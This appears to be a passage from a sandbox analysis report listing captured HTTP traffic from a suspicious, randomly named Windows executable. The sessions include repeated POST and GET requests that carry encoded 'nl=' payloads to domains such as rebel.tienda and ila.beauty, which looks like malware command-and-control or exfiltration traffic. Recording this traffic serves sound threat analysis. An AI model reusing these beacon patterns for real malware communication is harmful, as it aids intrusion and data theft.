Nov 1, 2024 03:47:30.743216991 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTdlZGFiNDktZGExMS00M2I3LWEwMGUtYjRhZDMxZjhjY2Y5IiwicGFnZV90aW1lIjoxNzMwNDI5Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50012	199.59.243.227	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:32.678112984 CET	1751	OUT	POST /7n9v/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.rebel.tienda Origin: http://www.rebel.tienda Referer: http://www.rebel.tienda/7n9v/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 30 4e 45 58 62 6a 7a 67 39 57 66 4d 4a 68 52 53 70 64 33 70 2b 38 6a 76 44 73 64 39 46 2f 74 61 69 79 44 74 66 61 76 46 30 47 4d 44 6d 4a 48 63 56 6d 35 50 67 5a 78 33 4b 43 76 4a 58 66 52 61 6c 59 4e 54 2f 51 47 44 70 4e 31 65 58 53 4c 49 76 6a 7a 65 58 46 74 33 79 34 78 7a 2f 71 4b 6a 4d 36 56 7a 61 6f 4a 58 46 4d 4e 32 4e 42 39 44 32 34 79 36 73 72 76 75 76 72 78 77 49 79 54 79 6c 4a 4a 6f 50 4e 4d 6f 43 52 50 6e 38 33 69 31 62 52 51 58 42 42 6f 63 6d 39 66 53 70 53 43 31 54 5a 71 50 49 47 36 33 73 34 7a 39 6f 6e 7a 58 44 38 70 4a 2f 77 64 58 32 73 68 4b 75 2b 79 32 52 64 48 46 6f 72 52 44 77 58 62 45 33 77 67 65 58 7a 6d 43 70 78 4d 36 46 77 74 4f 53 36 30 56 4e 38 37 55 31 6f 32 59 74 73 6a 6d 4e 64 4e 45 4b 32 48 37 67 4c 55 79 73 38 44 74 46 30 55 41 4b 64 57 36 69 2f 47 63 31 2f 75 4b 62 51 4b 50 46 58 54 6d 52 4d 43 51 76 69 43 30 7a 45 6d 37 73 59 6f 7a 6b 44 56 78 54 6a 47 58 77 47 52 77 37 4e 4f 33 39 47 76 48 2f 4b 48 39 45 39 61 6b 44 6d 6a 66 45 6f 41 31 4e 59 6f 68 6b 6e 7a [TRUNCATED] Data Ascii: nl=0NEXbjzg9WfMJhRSpd3p+8jvDsd9F/taiyDtfavF0GMDmJHcVm5PgZx3KCvJXfRalYNT/QGDpN1eXSLIvjzeXFt3y4xz/qKjM6VzaoJXFMN2NB9D24y6srvuvrxwIyTylJJoPNMoCRPn83i1bRQXBBocm9fSpSC1TZqPIG63s4z9onzXD8pJ/wdX2shKu+y2RdHForRDwXbE3wgeXzmCpxM6FwtOS60VN87U1o2YtsjmNdNEK2H7gLUys8DtF0UAKdW6i/Gc1/uKbQKPFXTmRMCQviC0zEm7sYozkDVxTjGXwGRw7NO39GvH/KH9E9akDmjfEoA1NYohknzPn9UIC00HpGt61XSarwB5qjORtqgFt+TsSNv1+ClUwxIQkLQadZPelysTxX64oYRL1pZ6ukRYOwmQfec1kCX06+fsMDd0V56K5EzqG0FdjDymBS+j0jimA9FFJgvFFkn5pLrTVU2xMgS+LZVpyoEJywhOElEHN5XqS1enGudzXOCknCCy0YeP7ubHEFvUlgfzY/Gvr5dYb3H2UJpOzhbNlDXVYQBRk8aHn8FXs9Pa4qDYK0bcgWcZtKXLOEsrtDw8cho6vUs9z2BBh4CamHSrf7VIXdlKjcxuo7jJpk9v/mhz1G6ejBBRQEbIzncUkh6ir26KXVjllO99DeBq3oig8/wtgPPkHhruOvajRPxmirYL4cVsW9MvBY5zRaTwSpn7diQ0obnCilF69SopsoFAVVM+NHWMTgEIx4WIfD7TCrd32PcNh+BZ1br72C8p0EVkueA3+uvhjsV5vvD2sKXfPPoDfzEqzGic0ZQJRmNN5x1+TKsiwiog5PTVpJ5JwB0WHj8iO7V5T6TZJ1rfEP872RJaaRJcOLYALrv/sDs13EmlAR3Ru0s0ZZyeKIVscjCKCSOA7Xh57n79yR3ZHZ+30PrGGGaZXHCJcxiw2W2AXyvd2uSvotBvoJOBY672LD4B47xRFz3i6/95Pt3Y6+P3Oyf0OUAVcX77e [TRUNCATED]
Nov 1, 2024 03:47:33.311518908 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 01 Nov 2024 02:47:32 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: fc722417-d925-4296-bc11-69bfe14df9bb cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ== set-cookie: parking_session=fc722417-d925-4296-bc11-69bfe14df9bb; expires=Fri, 01 Nov 2024 03:02:33 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 64 37 67 66 4c 38 69 58 64 43 4d 71 63 77 70 61 2b 59 2f 58 41 42 79 32 43 78 5a 52 63 77 37 37 4a 71 56 4c 4e 41 6c 69 77 2b 67 74 4a 73 45 48 6a 79 2b 36 2b 46 47 43 6e 73 72 41 42 7a 41 38 4d 58 71 46 63 54 66 79 42 2b 7a 53 52 6f 64 67 61 6a 70 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Jd7gfL8iXdCMqcwpa+Y/XABy2CxZRcw77JqVLNAliw+gtJsEHjy+6+FGCnsrABzA8MXqFcTfyB+zSRodgajpgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 1, 2024 03:47:33.312419891 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmM3MjI0MTctZDkyNS00Mjk2LWJjMTEtNjliZmUxNGRmOWJiIiwicGFnZV90aW1lIjoxNzMwNDI5Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50013	199.59.243.227	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:35.216301918 CET	466	OUT	GET /7n9v/?dbL=d8WX_v0PGVHXAtK&nl=5Ps3YXPo0Vj4JhRGre7eusiYM6VqaJdXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5eEZM56pgjuD4M6hDNIlUQpNxKD0Ll6OMyYftw5tyQwWC0A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.rebel.tienda User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:47:35.824925900 CET	1236	IN	HTTP/1.1 200 OK date: Fri, 01 Nov 2024 02:47:35 GMT content-type: text/html; charset=utf-8 content-length: 1498 x-request-id: 68fbe715-39b4-48c9-b351-9f812ba71026 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Or5LODOqlMFlq7zdndJLVpSuQYXuzU5Kxv5FWp2RfRvrrFZDuFzb5XHqkj/qcvYzqwOo+sWMIrtVs90p8Qyj8w== set-cookie: parking_session=68fbe715-39b4-48c9-b351-9f812ba71026; expires=Fri, 01 Nov 2024 03:02:35 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4f 72 35 4c 4f 44 4f 71 6c 4d 46 6c 71 37 7a 64 6e 64 4a 4c 56 70 53 75 51 59 58 75 7a 55 35 4b 78 76 35 46 57 70 32 52 66 52 76 72 72 46 5a 44 75 46 7a 62 35 58 48 71 6b 6a 2f 71 63 76 59 7a 71 77 4f 6f 2b 73 57 4d 49 72 74 56 73 39 30 70 38 51 79 6a 38 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Or5LODOqlMFlq7zdndJLVpSuQYXuzU5Kxv5FWp2RfRvrrFZDuFzb5XHqkj/qcvYzqwOo+sWMIrtVs90p8Qyj8w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 1, 2024 03:47:35.824947119 CET	951	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjhmYmU3MTUtMzliNC00OGM5LWIzNTEtOWY4MTJiYTcxMDI2IiwicGFnZV90aW1lIjoxNzMwNDI5Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50014	13.248.169.48	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:40.881968021 CET	708	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 74 50 36 49 2f 57 4d 71 2f 67 56 45 35 59 4a 61 51 45 38 48 66 65 43 6b 55 42 68 66 71 50 30 36 76 4b 6b 70 6d 6a 6e 4c 2f 77 71 43 74 34 50 6e 52 6f 73 76 48 42 72 5a 49 62 47 45 6a 44 70 2f 4a 49 6e 2f 78 54 77 52 79 32 75 56 48 70 56 66 55 42 46 74 70 73 77 56 5a 52 73 31 67 4a 2b 67 69 58 50 69 68 66 50 2b 2b 79 77 58 51 73 44 74 6a 64 4d 5a 70 4f 46 4a 55 74 49 66 6a 32 52 63 4d 6b 45 61 43 59 7a 75 65 67 6b 39 70 79 34 47 63 76 34 4e 4d 4c 53 71 6d 52 47 76 4a 59 45 34 79 50 68 67 65 42 61 39 69 33 72 2b 4c 63 6a 4c 36 56 4b 4d 4f 6a 57 35 73 34 45 3d Data Ascii: nl=Uo5VWlPpoEXKtP6I/WMq/gVE5YJaQE8HfeCkUBhfqP06vKkpmjnL/wqCt4PnRosvHBrZIbGEjDp/JIn/xTwRy2uVHpVfUBFtpswVZRs1gJ+giXPihfP++ywXQsDtjdMZpOFJUtIfj2RcMkEaCYzuegk9py4Gcv4NMLSqmRGvJYE4yPhgeBa9i3r+LcjL6VKMOjW5s4E=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50015	13.248.169.48	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:43.428323984 CET	728	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 38 41 36 76 76 41 70 70 43 6e 4c 36 77 71 43 6d 59 50 69 56 6f 73 53 48 47 69 75 49 65 47 45 6a 43 4e 2f 4a 4b 76 2f 74 31 34 51 79 6d 75 58 53 35 56 52 62 68 46 74 70 73 77 56 5a 52 6f 62 67 4a 47 67 69 6d 2f 69 69 36 37 39 34 43 77 59 52 73 44 74 77 4e 4e 65 70 4f 46 2f 55 6f 51 6d 6a 77 64 63 4d 6b 30 61 42 4b 62 74 48 51 6c 32 6e 53 34 52 5a 4e 52 57 46 35 75 55 75 41 32 70 58 2b 56 5a 7a 35 51 4b 45 6a 53 56 78 58 48 47 62 50 72 38 72 6c 72 6c 55 41 47 4a 79 76 54 6a 33 31 48 41 43 4d 4c 49 51 31 31 4d 64 65 4a 6a 34 7a 54 72 Data Ascii: nl=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp8A6vvAppCnL6wqCmYPiVosSHGiuIeGEjCN/JKv/t14QymuXS5VRbhFtpswVZRobgJGgim/ii6794CwYRsDtwNNepOF/UoQmjwdcMk0aBKbtHQl2nS4RZNRWF5uUuA2pX+VZz5QKEjSVxXHGbPr8rlrlUAGJyvTj31HACMLIQ11MdeJj4zTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50016	13.248.169.48	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:45.971652031 CET	1745	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 39 34 36 76 39 49 70 6d 41 50 4c 39 77 71 43 6c 59 50 6a 56 6f 73 44 48 41 4b 71 49 65 44 2f 6a 41 46 2f 4a 76 37 2f 39 41 59 51 6e 57 75 58 51 35 56 51 55 42 46 43 70 71 51 52 5a 51 59 62 67 4a 47 67 69 6c 6e 69 31 2f 50 39 6a 43 77 58 51 73 44 62 6a 64 4e 36 70 4f 63 4b 55 6f 63 70 69 41 39 63 4d 41 51 61 48 35 7a 74 4f 51 6c 30 79 53 35 55 5a 4e 4e 7a 46 39 50 6e 75 41 7a 2b 58 35 35 5a 2b 75 39 55 42 33 57 51 76 47 65 6e 63 49 6a 52 32 6a 61 47 53 7a 43 4a 30 65 2f 52 71 31 76 4a 44 61 6e 37 45 45 49 47 48 34 59 33 33 48 36 7a 47 69 54 4f 63 51 48 78 79 54 73 43 47 51 50 34 4b 4b 55 65 59 57 54 48 36 6d 43 50 6c 37 6a 6d 75 4b 6b 59 48 49 6b 47 51 4b 77 4b 4e 4a 79 70 39 51 4f 33 6d 35 54 69 62 45 69 58 42 42 66 6f 6b 37 76 6a 76 6c 2f 71 4a 76 62 66 4d 7a 51 2f 75 76 57 34 56 31 66 64 47 71 57 47 33 73 32 50 76 61 2b 78 48 33 6e 65 7a 61 34 31 4a 48 73 57 35 59 65 [TRUNCATED] Data Ascii: nl=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp946v9IpmAPL9wqClYPjVosDHAKqIeD/jAF/Jv7/9AYQnWuXQ5VQUBFCpqQRZQYbgJGgilni1/P9jCwXQsDbjdN6pOcKUocpiA9cMAQaH5ztOQl0yS5UZNNzF9PnuAz+X55Z+u9UB3WQvGencIjR2jaGSzCJ0e/Rq1vJDan7EEIGH4Y33H6zGiTOcQHxyTsCGQP4KKUeYWTH6mCPl7jmuKkYHIkGQKwKNJyp9QO3m5TibEiXBBfok7vjvl/qJvbfMzQ/uvW4V1fdGqWG3s2Pva+xH3neza41JHsW5YeeVdeI3JeWqQ3nNT1TaxOyoycV54cZPB9/Y6tGuE9jduOMxGC/ljpdPHstJDQRKv7ZZCMQXMbE00dJcKR53Pgafme41LwXVt4xupnwV0jKd7qXDefKLB1FwJzaAcTVW+bsuWiL1LJ8AEOs6hA8nXL4y6KJD5caruDG6zSsTRG76pC5TwQLjtFqK/VJum9Dgs52qeY2J8Fp3zO7ExazuX+X+qyCCKDJn8ECU2E0YnB2Z1q36nxW+EjqBKLJqOEuH2uVsFgZcNXYWGD6pU8fjTpgf9zZcskld/qMH5S091ebo1rt3etTPCnlHbsbmNcvryTyj3wThVeUJlzaruMVg6h02+oo/XJr6NCwy8v0Do34srIzdsQvspowmMCxOB3Ryq/HuwMS8UWnAIio+CRhu67ybwGwesfl85FqWCD5eXS0HNJ6ArxiyPZbceovjQXngemjVpnWzT0DOHDfUyEDw0JxCLKZeD668lX7b1cDOYXgQC8IuaGQx5NrsQ0Gi22cH3OxrsXom+itJxoBhQ1bhjsWBg7qWFWLLbZfiDSSiXqSJF61n2aUKu1PfAi6UPRQwbZgDGiigikB32K3eOvQ/e+xMPklbj32r1pEV7q9O1tQ4lTevOyxN+92F75dfN1g57ZTPhTqqQhppuIzxJ7Cd4jauVoGccKAJNnVy [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50017	13.248.169.48	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:48.513197899 CET	464	OUT	GET /izfe/?nl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&dbL=d8WX_v0PGVHXAtK HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ila.beauty User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Nov 1, 2024 03:47:49.173181057 CET	410	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 01 Nov 2024 02:47:49 GMT Content-Type: text/html Content-Length: 270 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 6c 3d 5a 71 52 31 56 53 61 75 2f 6e 6a 78 74 38 79 61 39 46 59 64 72 69 73 52 6e 50 77 45 53 52 38 50 57 4b 2b 6f 46 51 63 56 71 73 55 75 37 64 45 4e 6d 77 61 55 6f 47 4c 53 73 35 76 79 53 34 46 68 51 47 47 6c 42 36 72 38 68 48 74 77 54 59 66 4b 38 68 31 32 33 33 53 55 53 59 35 2b 66 41 49 78 6e 4c 45 41 50 78 4e 70 6d 70 75 66 6a 6c 4b 47 33 62 6e 67 38 43 56 73 4b 73 47 4e 79 62 63 55 31 67 3d 3d 26 64 62 4c 3d 64 38 57 58 5f 76 30 50 47 56 48 58 41 74 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?nl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&dbL=d8WX_v0PGVHXAtK"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50018	38.88.82.56	80	6612	C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 03:47:54.856195927 CET	729	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 6e 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 70 6b 5a 35 33 43 70 46 75 69 66 4d 36 47 56 62 55 66 66 6b 67 4c 63 56 74 78 7a 53 53 2f 6b 62 4c 56 6a 39 53 57 73 75 42 36 61 75 4f 69 79 76 74 67 55 41 73 68 76 74 67 46 77 71 2f 59 4b 70 4d 5a 69 68 41 58 76 69 6f 54 47 31 4d 49 38 58 52 58 50 4e 6d 5a 30 56 41 65 2b 49 47 33 47 30 54 74 69 4b 2f 71 79 72 6c 7a 30 57 6f 55 66 46 67 4f 45 34 6f 46 54 78 4f 63 63 4b 46 2f 6e 63 71 71 51 7a 6f 2f 30 31 44 58 2f 6c 6d 64 64 53 36 49 65 45 2f 38 38 55 67 66 76 2b 59 4d 65 42 4e 31 62 4c 36 68 39 4f 30 38 54 50 44 78 34 2b 46 37 41 63 44 2f 73 64 41 78 34 3d Data Ascii: nl=3iLjkEAo5UEVpkZ53CpFuifM6GVbUffkgLcVtxzSS/kbLVj9SWsuB6auOiyvtgUAshvtgFwq/YKpMZihAXvioTG1MI8XRXPNmZ0VAe+IG3G0TtiK/qyrlz0WoUfFgOE4oFTxOccKF/ncqqQzo/01DX/lmddS6IeE/88Ugfv+YMeBN1bL6h9O08TPDx4+F7AcD/sdAx4=
Nov 1, 2024 03:47:55.556006908 CET	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 01 Nov 2024 02:47:55 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 